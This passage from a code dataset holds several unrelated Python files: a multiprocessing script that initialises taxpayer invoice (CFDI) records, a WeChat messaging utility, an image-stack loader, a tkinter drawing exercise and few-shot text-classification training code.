_Utilities\nfrom General import firmware as _Firmware\n\nfrom Processes.Initialization import config as _Initialization_config\nfrom Processes.Initialization import locals as _Locals\nINITIALIZATION_CONFIG = _Initialization_config.initialization\nINITIALIZATION_LOGGING_CONFIG = INITIALIZATION_CONFIG['logging']\n\n# ======================================================== CODE \n\nLOG_INDENT = _Constants.LOG_INDENT\nINITIALIZATION_PROCESS_NAME = 'INITIALIZATION'\n\n# Cron logger (Main):\ncron_logger = _Utilities.get_logger('cron')\ninitialization_logger = _Utilities.get_logger(INITIALIZATION_LOGGING_CONFIG['process_file_name'])\n\n# Notes:\n# cron_logger -> log at cron main level execution\n# initialization_logger -> log at cron-initialization process level execution\n# process_logger -> log at cron-init-n subprocess level execution (n subprocesses every one has its log file)\n\n# Each initialization thread (i.e. subprocess) executes this function. 
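(an illustrative aside, not from this module: a typical split gives each of N worker subprocesses an interleaved share, e.g.\n# chunks = [taxpayers[i::n_processes] for i in range(n_processes)] # hypothetical names\n# workers = [multiprocessing.Process(target=excute_initialization, args=(chunk, shared_variables)) for chunk in chunks]\n# )\n# 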
Contains initialization process for a set of taxpayers\ndef excute_initialization(taxpayers,shared_variables):# Taxpayers are the ones splitted for this specific subprocess\n\ttry:\n\t\t# Shared variables:\n\t\tcurrent_taxpayer = shared_variables['current_taxpayer']\n\t\ttotal_taxpayers = shared_variables['total_taxpayers']\n\t\tcurrent_table_row = shared_variables['current_table_row']\n\t\tforcing_execution = shared_variables['forcing_execution']\n\t\tprocess_params = shared_variables['process_params']\n\t\tforcing_period = False\n\t\tif 'year' in process_params:\n\t\t\tforcing_period = True\n\t\tlock = shared_variables['lock']\n\t\t# Process:\n\t\tprocess_name = multiprocessing.current_process().name\n\t\ttotal_taxpayers_for_this_subprocess = len(taxpayers)\n\t\t# Process logger:\n\t\tprocess_logger = _Utilities.get_subprocess_logger(process_name,INITIALIZATION_LOGGING_CONFIG,logger=initialization_logger)\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(_Constants.LOG_SEPARATOR)\n\t\tprocess_logger.info(INITIALIZATION_PROCESS_NAME + ' - ' + process_name.upper())\n\t\ttaxpayers_initialized_counter = 0\n\t\tprocess_logger.info(LOG_INDENT + 'Forcing execution: ' + str(forcing_execution))\n\t\tprocess_logger.info(LOG_INDENT + 'Taxpayers: ' + str(total_taxpayers_for_this_subprocess))\n\t\tfor taxpayer in taxpayers:\n\t\t\tif not forcing_execution:\n\t\t\t\t_Utilities.update_current_taxpayer(_Constants.INITIALIZATION,taxpayer['identifier'],current_taxpayer.value+1,logger=process_logger)\n\t\t\tpercentage_of_initialization_done = _Utilities.get_process_percentage_done(taxpayers_initialized_counter,total_taxpayers_for_this_subprocess)\n\t\t\ttaxpayers_initialized_counter = taxpayers_initialized_counter + 1# Specific taxpayers (this thread's counter)\n\t\t\tprocess_logger.info(LOG_INDENT + '-> (' + str(taxpayers_initialized_counter) + '/' + str(total_taxpayers_for_this_subprocess) + ') ' + taxpayer['identifier'] + ' --- ' + percentage_of_initialization_done)\n\t\t\tinitialization_execution_data = excute_initialization_for_taxpayer(forcing_period=forcing_period,forcing_execution=forcing_execution,taxpayer=taxpayer,process_logger=process_logger,process_params=process_params)\n\t\t\twith lock:\n\t\t\t\tcurrent_taxpayer.value = current_taxpayer.value + 1\n\t\t\tcurrent_date = Datetime.now()\n\t\t\tinitialization_execution_log = {\n\t\t\t\t'date' : str(current_date)[:10],\n\t\t\t\t'hour' : str(current_date)[10:-7],\n\t\t\t\t'process_name' : process_name,\n\t\t\t\t'current_taxpayer_index' : current_taxpayer.value,\n\t\t\t\t'total_taxpayers' : total_taxpayers.value,\n\t\t\t\t'identifier' : taxpayer['identifier'],\n\t\t\t\t'new' : initialization_execution_data['new'],\n\t\t\t\t'stored' : initialization_execution_data['stored'],\n\t\t\t\t'year_initialized' : initialization_execution_data['year_initialized'],\n\t\t\t\t'month_initialized' : initialization_execution_data['month_initialized'],\n\t\t\t\t'percentage_initialized' : initialization_execution_data['percentage_initialized'],\n\t\t\t\t'initialized' : initialization_execution_data['initialized'],\n\t\t\t\t# 'new' : 0,\n\t\t\t\t# 'stored' : 0,\n\t\t\t\t# 'year_initialized' : '2015',\n\t\t\t\t# 'month_initialized' : '02',\n\t\t\t\t# 'percentage_initialized' : 0,\n\t\t\t\t'lock' : lock,\n\t\t\t\t'current_table_row' : current_table_row\n\t\t\t}# End of initialization_execution_log\n\t\t\tif initialization_execution_log['current_taxpayer_index'] == 
initialization_execution_log['total_taxpayers']:\n\t\t\t\tinitialization_execution_log['end'] = True\n\t\t\t\tinitialization_execution_log['end_message'] = INITIALIZATION_PROCESS_NAME + ' DONE SUCCESSFULLY \\\\0/'\n\t\t\telse:\n\t\t\t\tinitialization_execution_log['end'] = False\n\t\t\t_Locals.log_initiliazation_thread_logs_at_initialization_main_logs(initialization_execution_log=initialization_execution_log,initialization_logger=initialization_logger,cron_logger=cron_logger)\n\t\t\tif forcing_period or ('avoid_iteration' in initialization_execution_data and initialization_execution_data['avoid_iteration'] == True):\n\t\t\t\tprocess_logger.info(2*LOG_INDENT + 'NOT Updating initialization data for taxpayer ... ')\n\t\t\telse:\n\t\t\t\tprocess_logger.info(2*LOG_INDENT + 'Updating initialization data for taxpayer ... ')\n\t\t\t\t_Locals.update_initialization_data_for_taxpayer(taxpayer,initialization_execution_log,logger=process_logger)\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'Synchronized successfully. Logged at SL1 main logs')\n\t\tprocess_logger.info(INITIALIZATION_PROCESS_NAME + ' - ' + process_name.upper() + ' DONE SUCCESSFULLY \\0/')\n\t\tprocess_logger.info(_Constants.LOG_SEPARATOR)\n\t\treturn 'OK'\n\texcept Already_Handled_Exception as already_handled_exception:\n\t\traise already_handled_exception\n\texcept Exception as e:\n\t\tinitialization_logger.critical(e.message)\n\t\talready_handled_exception = Already_Handled_Exception(e.message)\n\t\traise already_handled_exception\n\n# Contains initialization process for a single taxpayer:\ndef excute_initialization_for_taxpayer(forcing_execution=False,forcing_period=False,taxpayer=None,process_logger=None,process_params=None):\n\ttry:\n\t\tprocess_logger.info(2*LOG_INDENT + 'Forcing period: ' + str(forcing_period))\n\t\tinitialization_data = _Locals.get_initialization_data(taxpayer,logger=process_logger,process_params=process_params)\n\t\tinitialized = initialization_data['initialized']\n\t\tif initialized == False:\n\t\t\tinitialization_log = _Locals.new_initialization_log(logger=process_logger)\n\t\t\t# Get CFDIs from DB:\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FOREST DB ... 
')\n\t\t\t_year = str(initialization_data['year'])\n\t\t\t_month = str(initialization_data['month'])\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Year: ' + str(initialization_data['year']) + ' Month: ' + str(initialization_data['month']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'From ' + str(initialization_data['begin_date']) + ' to ' + str(initialization_data['end_date']))\n\t\t\tcfdis_in_db = _Utilities.get_cfdis_in_forest_for_this_taxpayer_at_period(taxpayer,initialization_data['begin_date'],initialization_data['end_date'],limit=None)
\n\t\t\t# Manage or format CFDIs data:\n\t\t\texisting_cfdi_uuids = _Utilities.get_existing_uuids_in_forest_db(cfdis_in_db=cfdis_in_db,logger=process_logger)\n\t\t\t# Log Forest data:\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Existing: ' + str(len(existing_cfdi_uuids)))\n\t\t\t# Get CFDIs from firmware:\n\t\t\tget_sat_updates_params = {\n\t\t\t\t'identifier' : taxpayer['identifier'],\n\t\t\t\t'password' : taxpayer['password'],\n\t\t\t\t'year' : initialization_data['year'],\n\t\t\t\t'months' : [initialization_data['month']],\n\t\t\t\t'uuids' : existing_cfdi_uuids\n\t\t\t}# End of get_sat_updates_params
\n\t\t\t# -------------------------------------------------------------------\n\t\t\t# bugSolved 12/Aug/15\n\t\t\t# Event: timeout value was becoming longer and longer because of connection problems (firmware servers could not be reached due to connection problems instead of logic problems)\n\t\t\t# firmware_timeout = taxpayer['firmware_timeout'] if 'firmware_timeout' in taxpayer and taxpayer['firmware_timeout'] is not None else _Constants.DEFAULT_FIRMWARE_TIMEOUT\n\t\t\tfirmware_timeout = _Constants.DEFAULT_FIRMWARE_TIMEOUT\n\t\t\t# -------------------------------------------------------------------\n\t\t\t# process_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FIRMWARE (SAT) constant timeout = ' + str(firmware_timeout) + ' secs')\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FIRMWARE (SAT)')\n\t\t\tsat_updates = _Firmware.isa(instruction='get_sat_updates',params=get_sat_updates_params,log=initialization_log,logger=process_logger,timeout=firmware_timeout,taxpayer=taxpayer)\n\t\t\tnew_cfdis = sat_updates['new']\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'CFDI new: ' + str(initialization_log['firmware']['new']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'CFDI to-update: ' + str(initialization_log['firmware']['update']))
\n\t\t\t# Update Forest DB -> NEW OR COMPLETED:\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'UPDATING FOREST DB ... ')\n\t\t\tn = 0\n\t\t\tforest_db = _Utilities.set_connection_to_forest_db()\n\t\t\tfor new_cfdi in new_cfdis:\n\t\t\t\tuuid = new_cfdi.get('uuid','<missing uuid>')# Resolved before the try block so the except handler can always log it\n\t\t\t\ttry:\n\t\t\t\t\t_Utilities.create_cfdi(new_cfdi,logger=process_logger,log=initialization_log,forest_db=forest_db)\n\t\t\t\t\tn = n + 1\n\t\t\t\t\tprocess_logger.info(3*LOG_INDENT + str(n) + '. ' + uuid + ' stored in Forest DB')\n\t\t\t\texcept Exception:\n\t\t\t\t\tprocess_logger.info(3*LOG_INDENT + str(n) + '. ' + uuid + ' could not be stored in Forest DB (ERROR)')
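\n\t\t\t# [editor's note] Minimal sketch of the uuid diff this step relies on; the helper name and\n\t\t\t# its arguments are illustrative, not part of the original _Utilities module:\n\t\t\tdef split_new_and_known_sketch(sat_cfdis,existing_uuids):\n\t\t\t\texisting = set(existing_uuids)# a set gives O(1) membership tests\n\t\t\t\tnew_ones = [c for c in sat_cfdis if c['uuid'] not in existing]\n\t\t\t\tknown_ones = [c for c in sat_cfdis if c['uuid'] in existing]\n\t\t\t\treturn new_ones,known_ones
\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'SUMMARY ... 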
')\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'New stored: ' + str(initialization_log['forest_db']['after']['new']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Pending: ' + str(initialization_log['forest_db']['after']['pending']))\n\t\t\tinitialization_result = {\n\t\t\t\t'new' : initialization_log['firmware']['new'],\n\t\t\t\t'stored' : initialization_log['forest_db']['after']['new'],\n\t\t\t\t'year_initialized' : initialization_data['year'],\n\t\t\t\t'month_initialized' : initialization_data['month'],\n\t\t\t\t'avoid_iteration' : initialization_log['avoid_iteration'] if 'avoid_iteration' in initialization_log else False\n\t\t\t}# End of initialization_result\n\t\telse:\n\t\t\tinitialization_result = {\n\t\t\t\t'new' : _Constants.ZLATAN,\n\t\t\t\t'stored' : _Constants.ZLATAN,\n\t\t\t\t'year_initialized' : _Constants.ZLATAN,\n\t\t\t\t'month_initialized' : _Constants.ZLATAN\n\t\t\t}# End of initialization_result\n\t\t# Update taxpayer:\n\t\tnew_initialization_data = initialization_data['new_initialization_data']\n\t\tinitialization_result['initialized'] = initialized\n\t\tif forcing_period or ('avoid_iteration' in initialization_result and initialization_result['avoid_iteration'] == True):\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'NOT updating taxpayer initialization status ... ')\n\t\t\tinitialization_result['percentage_initialized'] = \"--.-%\"\n\t\telse:\n\t\t\ttaxpayer = _Locals.update_taxpayer_initialization_status(taxpayer,new_initialization_data,logger=process_logger,initialized=initialized)\n\t\t\tinitialization_result['percentage_initialized'] = taxpayer['data']['percentage_initialized']\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Percentage initialized: ' + str(initialization_result['percentage_initialized']))\n\t\tif forcing_execution:\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Sending telegram notification ... 
')\n\t\t\tmessage = 'Ya inicialice a este vato: ' + taxpayer['identifier'] + ' para el periodo ' + _month + '/' + _year\n\t\t\t_Utilities.send_message_to_forest_telegram_contacts(message,logger=process_logger)\n\t\treturn initialization_result\n\texcept Already_Handled_Exception as already_handled_exception:\n\t\traise already_handled_exception\n\texcept Exception as e:\n\t\tprocess_logger.critical(e.message)\n\t\talready_handled_exception = Already_Handled_Exception(e.message)\n\t\traise already_handled_exception\n","sub_path":"Processes/Initialization/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"389718353","text":"import itchat\nfrom app.constants import WxConstants, HttpConstants as httpconstants\nfrom app.util import HttpUtils as httputils\n\n\n# 查询是否添加该微信号\ndef is_friend(nick_name):\n friend_lists = itchat.search_friends(nickName=nick_name)\n if friend_lists is None or len(friend_lists) < 1:\n return False\n return True\n\n\n# 添加好友的请求\ndef add_friend(user_name, verify_content):\n content = verify_content\n if verify_content is None:\n content = WxConstants.VERIFY_CONTENT.format(user_name)\n is_success = itchat.add_friend(userName=user_name, verifyContent=content)\n print(is_success)\n return is_success\n\n\n# 退出登录重连\ndef keep_login():\n itchat.auto_login(hotReload=True)\n\n\n# 统一发送消息接口\ndef send_message(wx_id, message, is_jump):\n if itchat.check_login != 200:\n try:\n keep_login()\n except:\n return httputils.fail(\"登录异常\")\n friends = itchat.search_friends(remarkName=wx_id)\n if friends is None or len(friends) < 1:\n return httputils.fail(httpconstants.NOT_FOUND_FRIENDS)\n send_resp = friends[0].send(message)\n print(send_resp)\n is_send_success = (send_resp is not None and send_resp['BaseResponse']['Ret'] == 0)\n print('success = ' + str(is_send_success))\n if is_send_success and is_jump == '1':\n image_result = send_image(friend=friends[0])\n if image_result is not None and image_result['BaseResponse']['Ret'] == 0:\n return httputils.ok()\n else:\n return httputils.fail(image_result['BaseResponse']['ErrMsg'])\n elif is_send_success and is_jump == '0':\n return httputils.ok()\n else:\n return httputils.fail(send_resp['BaseResponse']['ErrMsg'])\n\n\n# 发送小程序的二维码\ndef send_image(friend, image=None):\n if image is None:\n image = httpconstants.JUMP_IMAGE_PATH\n return itchat.send_image(image, toUserName=friend['UserName'])\n\n\n# 向某个好友发送消息\n# def send_message(user_name, message):\n# if itchat.check_login is not 200:\n# keep_login()\n# friends = itchat.search_friends(nickName=user_name)\n# send_resp = friends[0].send(message)\n# print(str(send_resp))\n# if send_resp and send_resp['BaseResponse']['Ret'] == 0:\n# return httputils.ok()\n# else:\n# return httputils.fail(send_resp.BaseResponse.ErrMsg)\n\n\n# 查找好友\ndef find_firends(nick_name):\n return itchat.search_friends(nickName=nick_name)\n\n\n# 群发接口\ndef send_batch_message(user_lists, message_template):\n for user_name in user_lists:\n send_message(user_name, message_template.format(user_name))\n","sub_path":"app/util/WxchatUtils.py","file_name":"WxchatUtils.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313878069","text":"import json\nimport os\nfrom typing import Optional, Mapping\n\nimport numpy as np\nfrom slicedimage import TileSet, Tile\nfrom slicedimage.io import 
resolve_path_or_url\n\nfrom starfish.constants import Coordinates, Indices\nfrom .image import ImageStack\n\n\nclass Stack:\n\n def __init__(self):\n # data organization\n self.org = None\n self.image = None\n\n # auxiliary images\n self.auxiliary_images = dict()\n\n # readers and writers\n self.write_fn = np.save # asserted for now\n\n # backend & baseurl\n self.backend = None\n self.baseurl = None\n\n @classmethod\n def from_data(cls, image_stack: ImageStack, aux_dict: Optional[Mapping[str, ImageStack]]=None) -> \"Stack\":\n \"\"\"create a Stack from an already-loaded ImageStack\n\n Parameters\n ----------\n image_stack : ImageStack\n in-memory ImageStack\n aux_dict : Optional[Mapping[str, ImageStack]]\n a dictionary of ImageStacks, default None\n\n Returns\n -------\n Stack :\n a Stack object\n\n \"\"\"\n stack = cls()\n stack.image = image_stack\n stack.auxiliary_images = aux_dict if aux_dict is not None else dict()\n return stack\n\n def read(self, in_json_path_or_url):\n self.backend, name, self.baseurl = resolve_path_or_url(in_json_path_or_url)\n with self.backend.read_file_handle(name) as fh:\n self.org = json.load(fh)\n\n self.image = ImageStack.from_url(self.org['hybridization_images'], self.baseurl)\n for aux_key, aux_data in self.org['auxiliary_images'].items():\n self.auxiliary_images[aux_key] = ImageStack.from_url(aux_data, self.baseurl)\n\n @classmethod\n def from_experiment_json(cls, json_url: str) -> \"Stack\":\n \"\"\"Construct a `Stack` from an experiment.json file format specifier\n\n Parameters\n ----------\n json_url : str\n file path or web link to an experiment.json file\n\n Returns\n -------\n Stack :\n Stack object serving the requested image data\n\n \"\"\"\n stack: Stack = cls()\n stack.read(json_url)\n return stack\n","sub_path":"starfish/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581591144","text":"# reproduce this:\n# [https://github.com/greenfox-academy/teaching-materials/blob/master/workshop/drawing/purple-steps-3d/r4.png]\n# purple_square(10,10,25,25)\n\nfrom tkinter import *\n\nroot = Tk()\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n\ndef purple_cubics():\n x_coordinate = 0\n y_coordinate = 0\n size = 15\n for i in range(1, 20):\n square = canvas.create_rectangle(x_coordinate, y_coordinate, x_coordinate + size, y_coordinate + size, fill=\"red\") # nopep8\n x_coordinate = x_coordinate + size\n y_coordinate = y_coordinate + size\n size += 10\n\n\npurple_cubics()\nroot.mainloop()\n","sub_path":"week-03/day-03/purple_steps_3D.py","file_name":"purple_steps_3D.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288345873","text":"import os\r\nimport pickle\r\nimport time\r\nimport copy\r\nimport numpy as np\r\n\r\nfrom classifier.classifier_getter import get_classifier\r\nfrom tools.tool import parse_args, print_args, set_seed\r\n# from tools.visualization import Print_Attention\r\nimport dataset.loader as loader\r\nimport datetime\r\nfrom embedding.wordebd import WORDEBD\r\nimport torch\r\nimport torch.nn as nn\r\nfrom embedding.rnn import RNN\r\nimport torch.nn.functional as F\r\nfrom train.utils import grad_param, get_norm\r\nfrom dataset.sampler2 import SerialSampler, task_sampler\r\nfrom dataset import utils\r\nfrom tools.tool import neg_dist, pos_dist, reidx_y\r\nfrom tqdm import tqdm\r\nfrom termcolor import 
colored\r\nfrom torch import autograd\r\nfrom collections import OrderedDict\r\n\r\nimport sys\r\n\r\n\r\ndef zero_grad(params):\r\n for p in params:\r\n if p.grad is not None:\r\n p.grad.zero_()\r\n\r\n\r\ndef del_tensor_ele(arr, index):\r\n arr1 = arr[0:index]\r\n arr2 = arr[index + 1:]\r\n return torch.cat((arr1, arr2), dim=0)\r\n\r\n\r\ndef pre_calculate(train_data, class_names, net, args):\r\n with torch.no_grad():\r\n all_classes = np.unique(train_data['label'])\r\n num_classes = len(all_classes)\r\n\r\n # 生成sample类时候的概率矩阵\r\n train_class_names = {}\r\n train_class_names['text'] = class_names['text'][all_classes]\r\n train_class_names['text_len'] = class_names['text_len'][all_classes]\r\n train_class_names['label'] = class_names['label'][all_classes]\r\n train_class_names = utils.to_tensor(train_class_names, args.cuda)\r\n train_class_names_ebd = net.ebd(train_class_names) # [10, 36, 300]\r\n train_class_names_ebd = torch.sum(train_class_names_ebd, dim=1) / train_class_names['text_len'].view((-1, 1)) # [10, 300]\r\n dist_metrix = -neg_dist(train_class_names_ebd, train_class_names_ebd) # [10, 10]\r\n\r\n for i, d in enumerate(dist_metrix):\r\n if i == 0:\r\n dist_metrix_nodiag = del_tensor_ele(d, i).view((1, -1))\r\n else:\r\n dist_metrix_nodiag = torch.cat((dist_metrix_nodiag, del_tensor_ele(d, i).view((1, -1))), dim=0)\r\n\r\n prob_metrix = F.softmax(dist_metrix_nodiag, dim=1) # [10, 9]\r\n prob_metrix = prob_metrix.cpu().numpy()\r\n\r\n\r\n # 生成sample样本时候的概率矩阵\r\n example_prob_metrix = []\r\n for i, label in enumerate(all_classes):\r\n train_examples = {}\r\n train_examples['text'] = train_data['text'][train_data['label'] == label]\r\n train_examples['text_len'] = train_data['text_len'][train_data['label'] == label]\r\n train_examples['label'] = train_data['label'][train_data['label'] == label]\r\n train_examples = utils.to_tensor(train_examples, args.cuda)\r\n train_examples_ebd = net.ebd(train_examples)\r\n train_examples_ebd = torch.sum(train_examples_ebd, dim=1) / train_examples['text_len'].view(\r\n (-1, 1)) # [N, 300]\r\n example_prob_metrix_one = -neg_dist(train_class_names_ebd[i].view((1, -1)), train_examples_ebd)\r\n example_prob_metrix_one = F.softmax(example_prob_metrix_one, dim=1) # [1, 1000]\r\n example_prob_metrix_one = example_prob_metrix_one.cpu().numpy()\r\n example_prob_metrix.append(example_prob_metrix_one)\r\n\r\n return prob_metrix, example_prob_metrix\r\n\r\n\r\ndef get_embedding(vocab, args):\r\n print(\"{}, Building embedding\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n ebd = WORDEBD(vocab, args.finetune_ebd)\r\n\r\n modelG = ModelG(ebd, args)\r\n # modelD = ModelD(ebd, args)\r\n\r\n print(\"{}, Building embedding\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n if args.cuda != -1:\r\n modelG = modelG.cuda(args.cuda)\r\n # modelD = modelD.cuda(args.cuda)\r\n return modelG # , modelD\r\n else:\r\n return modelG # , modelD\r\n\r\n\r\ndef dis_to_level(dis):\r\n tmp_mean = torch.mean(dis, dim=-1, keepdim=True)\r\n result = dis / tmp_mean\r\n return -result\r\n\r\nclass ModelG(nn.Module):\r\n\r\n def __init__(self, ebd, args):\r\n super(ModelG, self).__init__()\r\n\r\n self.args = args\r\n\r\n self.ebd = ebd\r\n self.ebd_begin_len = args.ebd_len\r\n\r\n self.ebd_dim = self.ebd.embedding_dim\r\n self.hidden_size = 128\r\n\r\n # Text CNN\r\n ci = 1 # input chanel size\r\n kernel_num = args.kernel_num # output chanel size\r\n kernel_size = args.kernel_size\r\n dropout = args.dropout\r\n self.conv11 = nn.Conv2d(ci, kernel_num, 
(kernel_size[0], self.ebd_dim))\r\n self.conv12 = nn.Conv2d(ci, kernel_num, (kernel_size[1], self.ebd_dim))\r\n self.conv13 = nn.Conv2d(ci, kernel_num, (kernel_size[2], self.ebd_dim))\r\n self.dropout = nn.Dropout(dropout)\r\n self.fc = nn.Linear(len(kernel_size) * kernel_num, 64)\r\n self.cost = nn.CrossEntropyLoss()\r\n\r\n def forward_once(self, data):\r\n\r\n ebd = self.ebd(data) # [b, text_len, 300]\r\n # if data['text_len'][0] < 60:\r\n # ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd.unsqueeze(1) # [b, 1, text_len, 300]\r\n\r\n x1 = self.conv11(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x1.shape)\r\n x1 = F.relu(x1.squeeze(3)) # [b, kernel_num, H_out]\r\n x1 = F.max_pool1d(x1, x1.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n x2 = self.conv12(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x2.shape)\r\n x2 = F.relu(x2.squeeze(3)) # [b, kernel_num, H_out]\r\n x2 = F.max_pool1d(x2, x2.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n x3 = self.conv13(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x3.shape)\r\n x3 = F.relu(x3.squeeze(3)) # [b, kernel_num, H_out]\r\n x3 = F.max_pool1d(x3, x3.size(2)).squeeze(2) # [b, kernel_num]\r\n\r\n x = torch.cat((x1, x2, x3), 1) # [b, 3 * kernel_num]\r\n # x = self.dropout(x)\r\n\r\n x = self.fc(x) # [b, 128]\r\n x = self.dropout(x)\r\n\r\n return x\r\n\r\n def forward_once_with_param(self, data, param):\r\n\r\n ebd = self.ebd(data) # [b, text_len, 300]\r\n # if data['text_len'][0] < 60:\r\n # ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd.unsqueeze(1) # [b, 1, text_len, 300]\r\n\r\n w1, b1 = param['conv11']['weight'], param['conv11']['bias']\r\n x1 = F.conv2d(ebd, w1, b1) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x1.shape)\r\n x1 = F.relu(x1.squeeze(3)) # [b, kernel_num, H_out]\r\n x1 = F.max_pool1d(x1, x1.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n w2, b2 = param['conv12']['weight'], param['conv12']['bias']\r\n x2 = F.conv2d(ebd, w2, b2) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x2.shape)\r\n x2 = F.relu(x2.squeeze(3)) # [b, kernel_num, H_out]\r\n x2 = F.max_pool1d(x2, x2.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n w3, b3 = param['conv13']['weight'], param['conv13']['bias']\r\n x3 = F.conv2d(ebd, w3, b3) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x3.shape)\r\n x3 = F.relu(x3.squeeze(3)) # [b, kernel_num, H_out]\r\n x3 = F.max_pool1d(x3, x3.size(2)).squeeze(2) # [b, kernel_num]\r\n\r\n x = torch.cat((x1, x2, x3), 1) # [b, 3 * kernel_num]\r\n # x = self.dropout(x)\r\n\r\n w_fc, b_fc = param['fc']['weight'], param['fc']['bias']\r\n x = F.linear(x, w_fc, b_fc) # [b, 128]\r\n x = self.dropout(x)\r\n\r\n return x\r\n\r\n def forward(self, inputs_1, inputs_2, param=None):\r\n if param is None:\r\n out_1 = self.forward_once(inputs_1)\r\n out_2 = self.forward_once(inputs_2)\r\n else:\r\n out_1 = self.forward_once_with_param(inputs_1, param)\r\n out_2 = self.forward_once_with_param(inputs_2, param)\r\n return out_1, out_2\r\n\r\n def cloned_fc_dict(self):\r\n return {key: val.clone() for key, val in self.fc.state_dict().items()}\r\n\r\n def cloned_conv11_dict(self):\r\n return {key: val.clone() for key, val in self.conv11.state_dict().items()}\r\n\r\n def cloned_conv12_dict(self):\r\n return {key: val.clone() for key, val in self.conv12.state_dict().items()}\r\n\r\n def cloned_conv13_dict(self):\r\n return {key: val.clone() for key, val in self.conv13.state_dict().items()}\r\n\r\n def loss(self, logits, label):\r\n loss_ce = 
self.cost(logits, label)\r\n return loss_ce\r\n\r\n def accuracy(self, pred, label):\r\n '''\r\n pred: Prediction results with whatever size\r\n label: Label with whatever size\r\n return: [Accuracy] (A single value)\r\n '''\r\n return torch.mean((pred.view(-1) == label).type(torch.FloatTensor))\r\n\r\n\r\n\r\n# 自定义ContrastiveLoss\r\nclass ContrastiveLoss(torch.nn.Module):\r\n \"\"\"\r\n Contrastive loss function.\r\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\r\n \"\"\"\r\n\r\n def __init__(self, margin=2.0):\r\n super(ContrastiveLoss, self).__init__()\r\n self.margin = margin\r\n\r\n def forward(self, output1, output2, label, weight):\r\n euclidean_distance = F.pairwise_distance(output1, output2, keepdim=True)\r\n euclidean_distance = euclidean_distance / torch.mean(euclidean_distance)\r\n\r\n tmp1 = (label) * torch.pow(euclidean_distance, 2).squeeze(-1)\r\n # mean_val = torch.mean(euclidean_distance)\r\n tmp2 = (1 - label) * torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0),\r\n 2).squeeze(-1)\r\n loss_contrastive = torch.mean((tmp1 + tmp2)*weight)\r\n\r\n # print(\"**********************************************************************\")\r\n return loss_contrastive\r\n\r\n\r\n\r\ndef get_weight_of_test_support(support, query, args):\r\n if len(support) > args.way*args.shot:\r\n support = support[0:args.way*args.shot]\r\n result = torch.cat( (torch.ones([args.way*args.shot*args.way]), args.test_loss_weight*torch.ones([args.way*args.way])),0 )\r\n\r\n tensor_shape = support.shape[-1]\r\n for each_way in range(args.way):\r\n this_support = support[each_way*args.shot:each_way*args.shot+args.shot]\r\n this_query = query[each_way*args.query:each_way*args.query+args.query]\r\n all_dis = torch.ones([args.shot])\r\n new_support = torch.ones([args.query,tensor_shape])\r\n for each_shot in range(args.shot):\r\n new_support[:] = this_support[each_shot]\r\n new_support = new_support.cuda(args.cuda)\r\n this_dis = F.pairwise_distance(new_support, this_query, keepdim=True)\r\n this_dis = torch.mean(this_dis)\r\n all_dis[each_shot] = this_dis\r\n probab = dis_to_level(all_dis)\r\n probab = F.softmax(probab, dim = -1)\r\n probab = 5*probab\r\n for each_shot in range(args.shot):\r\n begin = each_way*(args.shot*args.way)+each_shot*args.way\r\n result[begin:begin+args.way] = probab[each_shot]\r\n\r\n if args.cuda != -1:\r\n result = result.cuda(args.cuda)\r\n return result\r\n\r\n\r\ndef train_one(task, class_names, model, optG, criterion, args, grad):\r\n '''\r\n Train the model on one sampled task.\r\n '''\r\n model['G'].train()\r\n # model['G2'].train()\r\n # model['clf'].train()\r\n\r\n support, query = task\r\n # print(\"support, query:\", support, query)\r\n # print(\"class_names_dict:\", class_names_dict)\r\n\r\n '''分样本对'''\r\n YS = support['label']\r\n YQ = query['label']\r\n\r\n sampled_classes = torch.unique(support['label']).cpu().numpy().tolist()\r\n # print(\"sampled_classes:\", sampled_classes)\r\n\r\n class_names_dict = {}\r\n class_names_dict['label'] = class_names['label'][sampled_classes]\r\n # print(\"class_names_dict['label']:\", 